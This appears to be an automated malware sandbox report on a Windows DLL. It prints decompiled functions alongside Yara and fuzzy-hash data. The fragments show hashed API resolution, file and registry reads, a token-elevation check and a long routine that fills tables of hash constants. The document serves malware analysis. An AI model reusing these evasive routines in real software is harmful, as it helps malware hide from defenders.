Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction ID: 909bc61e7fade3862c272ce51cfc292b3e89f1076bcc5f00f02ba3cce6f3f741
Opcode Fuzzy Hash: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction Fuzzy Hash: 6401F73528120AFAFAE02FE54D49F7B774CDF82658F084835BE01551C9EE23A965C138

Uniqueness

Uniqueness Score: -1.00%

Function 6ED05E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6ED05E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6ECFC280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6ED03064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6ed05e14
0x6ed05e15
0x6ed05e17
0x6ed05e1d
0x6ed05e1f
0x6ed05e23
0x6ed05e23
0x6ed05e27
0x6ed05e33
0x6ed05e67
0x6ed05e67
0x00000000
0x6ed05e35
0x6ed05e3a
0x6ed05e3b
0x6ed05e4f
0x6ed05e60
0x6ed05e51
0x6ed05e5c
0x6ed05e5c
0x6ed05e65
0x6ed05e6d
0x6ed05e6f
0x6ed05e72
0x6ed05e77
0x6ed05e77
0x6ed05e7b
0x6ed05e80
0x00000000
0x00000000
0x00000000
0x6ed05e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6ED05D48,?,?), ref: 6ED05E5C

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction ID: 4cd0f42feb74b9f66085fbec5517b25a1bbfc890d789a5deb0c3c393ef464aa4
Opcode Fuzzy Hash: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction Fuzzy Hash: 78F0F931A19B15F9D7B15FB99C40A9F73E8DFD1790F184A2DFDC0A6184E670D4408261

Uniqueness

Uniqueness Score: -1.00%

Function 6ED05E84, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED05E84(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6ECFC280(_t19) == 0) {
					_v12 = _a8;
					if(E6ED03064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6ED035F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6ed05e87
0x6ed05e89
0x6ed05e95
0x6ed05e9f
0x6ed05eb5
0x6ed05ed4
0x6ed05eb7
0x6ed05ec8
0x6ed05ecc
0x6ed05eec
0x6ed05ece
0x6ed05ece
0x6ed05ece
0x6ed05ecc
0x6ed05ed5
0x6ed05eda
0x6ed05ee3
0x6ed05edc
0x6ed05edc
0x6ed05ede
0x6ed05ede
0x6ed05e97
0x6ed05e97
0x6ed05e97
0x6ed05ee9

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6ED05D79,00000000,?,00000000,?), ref: 6ED05EC8

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction ID: 840ba4a4b9332f72055cad00647808d6cf526afb49d007237d539ef6a63d91c3
Opcode Fuzzy Hash: 84a6624f29361c2a8c98364ad473c0758c1d35c4603bde8f3404ef6b27891e48
Instruction Fuzzy Hash: D6F08131258207EED7A1EFA99C10AAE77D9AF49250F184C2AACD5C6180EA32D414C621

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ED0564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6ED03064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6ECFE644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6ed05656
0x6ed05658
0x6ed0565f
0x6ed05661
0x6ed05665
0x6ed05667
0x6ed0566a
0x6ed0566d
0x6ed0566d
0x6ed05687
0x00000000
0x00000000
0x6ed05698
0x6ed0569c
0x00000000
0x00000000
0x6ed056aa
0x6ed056ad
0x6ed056b2
0x6ed056b7
0x6ed056b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6ED05698

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction ID: 0049467b555a0f0fa7da58bd3196e76bfc6aa2c495adb12d61af15667dc5cf6d
Opcode Fuzzy Hash: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction Fuzzy Hash: 1AF0C2B520030AAFE7249F5ACC54DBBBBFCEBC1B50F04892DA4D542600EA31AC50CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6ED01030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6ED0306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6ED0306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6ed0103e
0x6ed01040
0x6ed0104e
0x6ed01052
0x6ed0109b
0x00000000
0x6ed0109b
0x6ed01057
0x6ed01058
0x6ed0105a
0x6ed0105f
0x00000000
0x6ed01078
0x6ed0107c
0x6ed01089
0x6ed0108d
0x00000000
0x00000000
0x00000000
0x6ed01096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6ED01089

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: 4aa307f85999f9150fc4c4b6b58e84e402fb153d9e04fca6eacfdf518873937b
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: FFF04470244643ABFA409EB8AC65F7F32AD5BC1614F548828B580CA194DB74CA498625

Uniqueness

Uniqueness Score: -1.00%

Function 6ED03628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6ED03628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6ed0d228 == 0xa33c83e5) {
					_t7 = E6ED03064(0x60a28c5c, 0x1c6ef387);
					 *0x6ed0d22c = E6ED03064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6ed0d228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6ed0d228 = 0;
					}
				}
				_t3 = E6ED03064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6ed0d228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6ed03630
0x6ed03638
0x6ed0366b
0x6ed0367c
0x6ed03687
0x6ed03692
0x6ed03694
0x6ed03694
0x6ed03687
0x6ed03644
0x6ed0364b
0x00000000
0x6ed0364d
0x6ed0364d
0x6ed0364e
0x6ed03650
0x6ed03652
0x6ed03653
0x00000000
0x6ed03653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6ECFDE09,?,?), ref: 6ED03692

Memory Dump Source

Source File: 00000001.00000002.693021141.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000001.00000002.692999232.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693073073.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.693089731.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.693101054.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: e0443136f1b75aa8401e85d1a46fc57a6baa19909461b9a2957e4b3ed3545cb5
Instruction ID: 861672f95027b3e2e9fc759fc8f08e04ad04ba5db2bbb923a18cc7359c5ea2c1
Opcode Fuzzy Hash: e0443136f1b75aa8401e85d1a46fc57a6baa19909461b9a2957e4b3ed3545cb5
Instruction Fuzzy Hash: 36F0E234256391FEEA605FFBEC08D66A7A8EF55695F8C0C3DF2C4A6204D6B0C880D635

Uniqueness

Uniqueness Score: -1.00%

Function 00D91000, Relevance: 1.4, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00D910FF

Memory Dump Source

Source File: 00000001.00000002.692433477.0000000000D90000.00000040.00000001.sdmp, Offset: 00D90000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction ID: 0512d0132d0f60b5d3cf9017b5e2950fd88503ecadf956c35f9d3fda8ce164bd
Opcode Fuzzy Hash: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction Fuzzy Hash: 3F41E5B5E0521A8FDB04DFA8C4946AEBBF0FF48314F19856DE448AB340D375A841CFA4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6ECF1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6ECF1494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6ECFF584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v76, E6ECFF4CC( &_v76) + 0x10);
				E6ECFF4BC( &_v80, E6ECFF4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v84, E6ECFF4CC(_t325) + 0x10);
				E6ECFF4BC( &_v88, E6ECFF4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v92, E6ECFF4CC(_t329) + 0x10);
				E6ECFF4BC( &_v96, E6ECFF4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v100, E6ECFF4CC(_t333) + 0x10);
				E6ECFF4BC( &_v104, E6ECFF4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v108, E6ECFF4CC(_t337) + 0x10);
				E6ECFF4BC( &_v112, E6ECFF4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v116, E6ECFF4CC(_t341) + 0x10);
				E6ECFF4BC( &_v120, E6ECFF4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v124, E6ECFF4CC(_t345) + 0x10);
				E6ECFF4BC( &_v128, E6ECFF4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v132, E6ECFF4CC(_t349) + 0x10);
				E6ECFF4BC( &_v136, E6ECFF4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v140, E6ECFF4CC(_t353) + 0x10);
				E6ECFF4BC( &_v144, E6ECFF4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v148, E6ECFF4CC(_t357) + 0x10);
				E6ECFF4BC( &_v152, E6ECFF4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v156, E6ECFF4CC(_t361) + 0x10);
				E6ECFF4BC( &_v160, E6ECFF4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v164, E6ECFF4CC(_t365) + 0x10);
				E6ECFF4BC( &_v168, E6ECFF4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v172, E6ECFF4CC(_t369) + 0x10);
				E6ECFF4BC( &_v176, E6ECFF4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v180, E6ECFF4CC(_t373) + 0x10);
				E6ECFF4BC( &_v184, E6ECFF4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v188, E6ECFF4CC(_t377) + 0x10);
				E6ECFF4BC( &_v192, E6ECFF4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v196, E6ECFF4CC(_t381) + 0x10);
				E6ECFF4BC( &_v200, E6ECFF4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v204, E6ECFF4CC(_t385) + 0x10);
				E6ECFF4BC( &_v208, E6ECFF4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6ED04200(0x60a28c5c, _t434);
				E6ECFF4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6ECFF4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6ECFF4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6ECFF4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6ECFF4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6ECFF4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6ECFF4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6ECFF4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6ECFF4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6ECFF4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6ECFF4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6ECFF4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6ECFF4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6ECFF4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6ECFF4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6ECFF4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6ECFF4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6ECF1D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6ECFB27C( &_v248, _v256, _t481, _v252, _t318);
				E6ECFF840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v296, E6ECFF4CC(_t410) + 0x10);
				E6ECFF4BC( &_v300, E6ECFF4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v304, E6ECFF4CC(_t414) + 0x10);
				E6ECFF4BC( &_v308, E6ECFF4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v312, E6ECFF4CC(_t418) + 0x10);
				E6ECFF4BC( &_v316, E6ECFF4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6ECFF828( &_v320, E6ECFF4CC(_t422) + 0x10);
				E6ECFF4BC( &_v324, E6ECFF4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6ECFB9FC(_t154,  *_t480);
				E6ECFF4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6ECFF4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6ECFF4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6ECFF4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6ECFF654( &_v316);
				return E6ECFF654( &_v356);
			}

0x6ecf1494
0x6ecf1498
0x6ecf149d
0x6ecf14a3
0x6ecf14ab
0x6ecf14b0
0x6ecf14bc
0x6ecf14c0
0x6ecf14d2
0x6ecf14e8
0x6ecf14f3
0x6ecf14f4
0x6ecf14f5
0x6ecf14f6
0x6ecf14f7
0x6ecf14fa
0x6ecf14fe
0x6ecf1502
0x6ecf1509
0x6ecf151b
0x6ecf1531
0x6ecf153c
0x6ecf153d
0x6ecf153e
0x6ecf153f
0x6ecf1540
0x6ecf1543
0x6ecf1547
0x6ecf154b
0x6ecf1552
0x6ecf1564
0x6ecf157a
0x6ecf1585
0x6ecf1586
0x6ecf1587
0x6ecf1588
0x6ecf1589
0x6ecf158c
0x6ecf1590
0x6ecf1594
0x6ecf159b
0x6ecf15ad
0x6ecf15c3
0x6ecf15ce
0x6ecf15cf
0x6ecf15d0
0x6ecf15d1
0x6ecf15d2
0x6ecf15d5
0x6ecf15d9
0x6ecf15dd
0x6ecf15e4
0x6ecf15f6
0x6ecf160c
0x6ecf1617
0x6ecf1618
0x6ecf1619
0x6ecf161a
0x6ecf161b
0x6ecf161e
0x6ecf1622
0x6ecf1626
0x6ecf162d
0x6ecf163f
0x6ecf1655
0x6ecf1660
0x6ecf1661
0x6ecf1662
0x6ecf1663
0x6ecf1664
0x6ecf1667
0x6ecf166b
0x6ecf166f
0x6ecf1676
0x6ecf1688
0x6ecf169e
0x6ecf16a9
0x6ecf16aa
0x6ecf16ab
0x6ecf16ac
0x6ecf16ad
0x6ecf16b0
0x6ecf16b4
0x6ecf16b8
0x6ecf16bf
0x6ecf16d1
0x6ecf16e7
0x6ecf16f2
0x6ecf16f3
0x6ecf16f4
0x6ecf16f5
0x6ecf16f6
0x6ecf16f9
0x6ecf16fd
0x6ecf1701
0x6ecf1708
0x6ecf171a
0x6ecf1730
0x6ecf173b
0x6ecf173c
0x6ecf173d
0x6ecf173e
